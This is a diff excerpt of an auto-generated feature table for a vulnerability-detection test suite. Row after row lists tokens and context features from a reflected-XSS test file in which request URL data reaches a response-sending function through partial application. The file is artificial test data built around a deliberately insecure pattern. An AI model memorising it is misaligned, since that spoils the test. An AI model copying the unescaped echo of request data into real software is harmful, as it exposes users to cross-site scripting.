autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callback | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:7:22:58 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:27 | underscore | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:27 | underscore | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:27 | underscore | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:27 | underscore | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:27 | underscore | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:35 | underscore.partial | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:35 | underscore.partial | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:35 | underscore.partial | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:35 | underscore.partial | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:35 | underscore.partial | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | exceptional return of undersc ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | exceptional return of undersc ... eq.url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | exceptional return of undersc ... eq.url) | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | exceptional return of undersc ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | exceptional return of undersc ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | undersc ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | undersc ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | undersc ... eq.url) | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | undersc ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:18:22:58 | undersc ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:22:29:22:35 | partial | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:29:22:35 | partial | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:22:29:22:35 | partial | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:29:22:35 | partial | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:29:22:35 | partial | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:22:37:22:48 | sendResponse | CalleeFlexibleAccessPath | underscore.partial | | autogenerated/Xss/ReflectedXss/partial.js:22:37:22:48 | sendResponse | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:22:37:22:48 | sendResponse | calleeImports | underscore | @@ -21642,6 +144151,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:22:37:22:48 | sendResponse | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:22:37:22:48 | sendResponse | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:22:37:22:48 | sendResponse | receiverName | underscore | +| autogenerated/Xss/ReflectedXss/partial.js:22:51:22:53 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:51:22:53 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:22:51:22:53 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:51:22:53 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:51:22:53 | req | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:22:51:22:57 | req.url | CalleeFlexibleAccessPath | underscore.partial | | autogenerated/Xss/ReflectedXss/partial.js:22:51:22:57 | req.url | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/partial.js:22:51:22:57 | req.url | calleeImports | underscore | @@ -21651,6 +144165,66 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:22:51:22:57 | req.url | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:22:51:22:57 | req.url | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:22:51:22:57 | req.url | receiverName | underscore | +| autogenerated/Xss/ReflectedXss/partial.js:22:55:22:57 | url | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:22:55:22:57 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:22:55:22:57 | url | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:22:55:22:57 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:22:55:22:57 | url | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:11 | [1, 2, 3] | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:11 | [1, 2, 3] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:11 | [1, 2, 3] | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:11 | [1, 2, 3] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:11 | [1, 2, 3] | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:19 | [1, 2, 3].forEach | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:19 | [1, 2, 3].forEach | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:19 | [1, 2, 3].forEach | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:19 | [1, 2, 3].forEach | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:19 | [1, 2, 3].forEach | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | [1, 2, ... llback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | [1, 2, ... llback) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | [1, 2, ... llback) | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | [1, 2, ... llback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | [1, 2, ... llback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | exceptional return of [1, 2, ... llback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | exceptional return of [1, 2, ... llback) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | exceptional return of [1, 2, ... llback) | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | exceptional return of [1, 2, ... llback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:3:23:29 | exceptional return of [1, 2, ... llback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:4:23:4 | 1 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:7:23:7 | 2 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:10:23:10 | 3 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:23:13:23:19 | forEach | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:23:13:23:19 | forEach | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:23:13:23:19 | forEach | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:23:13:23:19 | forEach | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:23:13:23:19 | forEach | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:23:21:23:28 | callback | CalleeFlexibleAccessPath | ?.forEach | | autogenerated/Xss/ReflectedXss/partial.js:23:21:23:28 | callback | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:23:21:23:28 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21658,6 +144232,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:23:21:23:28 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback underscore partial sendResponse req url 1 2 3 forEach callback | | autogenerated/Xss/ReflectedXss/partial.js:23:21:23:28 | callback | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:23:21:23:28 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:26:3 | app | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:26:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:26:3 | app | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:26:7 | app.get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:26:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:26:7 | app.get | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:33:2 | app.get ... ck);\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:33:2 | app.get ... ck);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:33:2 | app.get ... ck);\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:33:2 | exceptional return of app.get ... ck);\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:33:2 | exceptional return of app.get ... ck);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:1:33:2 | exceptional return of app.get ... ck);\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:5:26:7 | get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:5:26:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:5:26:7 | get | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:26:9:26:17 | "/lodash" | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:26:9:26:17 | "/lodash" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:26:9:26:17 | "/lodash" | calleeImports | express | @@ -21665,6 +144254,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:26:9:26:17 | "/lodash" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:26:9:26:17 | "/lodash" | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:26:9:26:17 | "/lodash" | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:19 | lodash | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:19 | lodash | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:19 | lodash | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:19 | lodash | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:19 | lodash | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:20 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:20 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:20 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:20 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:26:20 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | 'arguments' object of anonymous function | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | (req, r ... ack);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | (req, r ... ack);\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | (req, r ... ack);\\n} | calleeImports | express | @@ -21672,6 +144276,130 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | (req, r ... ack);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | (req, r ... ack);\\n} | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | (req, r ... ack);\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | exceptional return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | exceptional return of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | exceptional return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | return of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:20:33:1 | return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:21:26:23 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:26:26:26:28 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | this | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | this | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:27:2 | this | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | 'arguments' object of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | 'arguments' object of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | 'arguments' object of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | 'arguments' object of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | 'arguments' object of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | exceptional return of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, 